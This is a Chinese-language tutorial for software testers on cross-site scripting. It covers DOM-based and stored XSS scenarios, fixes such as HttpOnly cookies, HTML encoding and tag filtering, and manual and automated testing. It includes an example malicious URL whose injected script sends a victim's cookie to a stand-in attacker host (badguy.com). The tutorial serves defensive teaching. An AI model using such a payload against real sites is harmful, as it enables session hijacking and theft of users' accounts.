web安全测试

XSS 全称(Cross Site Scripting) 跨站脚本攻击， 是Web程序中最多见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时，脚本就会在用户的浏览器上执行，从而达到攻击者的目的.  好比获取用户的Cookie，导航到恶意网站,携带木马等。

做为测试人员，须要了解XSS的原理，攻击场景，如何修复。 才能有效的防止XSS的发生。

XSS 攻击场景

1. Dom-Based XSS 漏洞 攻击过程以下

Tom 发现了Victim.com中的一个页面有XSS漏洞，

例如: http://victim.com/search.asp?term=apple

服务器中Search.asp 页面的代码大概以下

　　　　Results  for  
　　　　...

Tom 先创建一个网站http://badguy.com,  用来接收“偷”来的信息。
而后Tom 构造一个恶意的url(以下), 经过某种方式(邮件，QQ)发给Monica

http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

Monica点击了这个URL， 嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行. 那么Monica在victim.com网站的cookie, 就会被发送到badguy网站中。这样Monica在victim.com 的信息就被Tom盗了.

 

2. Stored XSS(存储式XSS漏洞), 该类型是应用普遍并且有可能影响大Web服务器自身安全的漏洞，攻击者将攻击脚本上传到Web服务器上，使得全部访问该页面的用户都面临信息泄露的可能。 攻击过程以下

Alex发现了网站A上有一个XSS 漏洞，该漏洞容许将攻击代码保存在数据库中，

Alex发布了一篇文章，文章中嵌入了恶意JavaScript代码。

其余人如Monica访问这片文章的时候，嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行，其会话cookie或者其余信息将被Alex盗走。

 

Dom-Based XSS漏洞威胁用户个体，而存储式XSS漏洞所威胁的对象将是大量的用户.

XSS 漏洞修复

原则：　不相信客户输入的数据
注意:  攻击代码不必定在<script></script>中

1. 将重要的cookie标记为http only,   这样的话Javascript 中的document.cookie语句就不能获取到cookie了.

2. 只容许用户输入咱们指望的数据。 例如：　年龄的textbox中，只容许用户输入数字。 而数字以外的字符都过滤掉。

3. 对数据进行Html Encode 处理

4. 过滤或移除特殊的Html标签， 例如: <script>, <iframe> ,  &lt; for <, &gt; for >, &quot for

5. 过滤JavaScript 事件的标签。例如 "onclick=", "onfocus" 等等。

如何测试XSS漏洞

方法一：  查看代码，查找关键的变量,   客户端将数据传送给Web 服务端通常经过三种方式 Querystring, Form表单，以及cookie.  例如在ASP的程序中，经过Request对象获取客户端的变量

<%
strUserCode =  Request.QueryString(“code”);
strUser =  Request.Form(“USER”);
strID =    Request.Cookies(“ID”);
%>

假如变量没有通过htmlEncode处理， 那么这个变量就存在一个XSS漏洞

 

 方法二：　准备测试脚本，

"/>

 在网页中的Textbox或者其余能输入数据的地方，输入这些测试脚本， 看能不能弹出对话框，能弹出的话说明存在XSS漏洞

 在URL中查看有那些变量经过URL把值传给Web服务器， 把这些变量的值退换成咱们的测试的脚本。  而后看咱们的脚本是否能执行

 

方法三:  自动化测试XSS漏洞如今已经有不少XSS扫描工具了。 实现XSS自动化测试很是简单，只须要用HttpWebRequest类。 把包含xss 测试脚本。发送给Web服务器。 而后查看HttpWebResponse中，咱们的XSS测试脚本是否已经注入进去了。